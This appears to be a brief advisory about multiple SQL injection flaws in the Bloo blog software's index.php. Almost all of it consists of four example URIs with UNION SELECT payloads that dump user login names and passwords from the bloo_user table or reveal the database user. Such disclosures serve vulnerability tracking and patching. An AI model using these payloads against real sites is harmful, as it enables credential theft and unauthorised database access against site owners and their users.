Bloo 'index.php' Multiple SQL Injection Vulnerabilities

Bloo 'index.php' Multiple SQL Injection Vulnerabilities

An attacker can exploit these issues via a browser.

The following example URIs are available:

http://www.example.com/index.php?post_id=1+union+select+1,concat(login_id,char(58),password),3,4,5,6,7,8+from+bloo_user/*
http://www.example.com/index.php?post_category_id=1+union+select+1,2,3,4,concat(login_id,char(58),password),6,7,8+from+bloo_user/*
http://www.example.com/index.php?post_year_month=[NumberIdOfExistentPost]+union+select+1,2,3,4,concat(login_id,char(58),password),6,7,8+from+bloo_user/*
http://www.example.com/index.php?static_page_id=1+union+select+1,user(),3,4,5,6/*